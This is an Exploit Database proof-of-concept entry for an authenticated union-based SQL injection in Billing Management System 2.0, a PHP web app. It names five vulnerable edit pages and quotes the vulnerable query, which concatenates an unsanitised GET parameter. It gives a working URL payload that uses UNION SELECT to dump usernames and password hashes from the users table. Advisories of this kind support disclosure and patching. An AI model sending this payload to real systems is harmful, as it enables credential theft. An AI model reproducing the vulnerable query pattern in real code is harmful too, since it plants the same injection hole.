Billing Management System 2.0 – Union based SQL injection (Authenticated)

• Exploit Database
• 17 阅读

• 作者： Mohammad Koochaki
  日期： 2021-05-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49874/

• # Exploit Title: Billing Management System 2.0 - Union based SQL injection (Authenticated)
  # Date: 2021-05-16
  # Exploit Author: Mohammad Koochaki
  # Vendor Homepage: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
  # Software Link: https://www.sourcecodester.com/download-code?nid=14380&title=Billing+Management+System+in+PHP%2FMySQLi+with+Source+Code
  # Version: 2.0
  
  # This web application contains several SQL injection vulnerabilities in the following paths:
  - http://localhost/editgroup.php?id=1
  - http://localhost/edituser.php?id=1
  - http://localhost/editcategory.php?id=10
  - http://localhost/editproduct.php?id=1
  - http://localhost/editsales.php?id=1
  
  # PoC (editgroup.php):
  
  - Vulnerable code:
  $sql="SELECT * from user_groups where delete_status='0' and
  id='".$_GET['id']." '";
  
  - Payload:
  
  http://localhost/editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+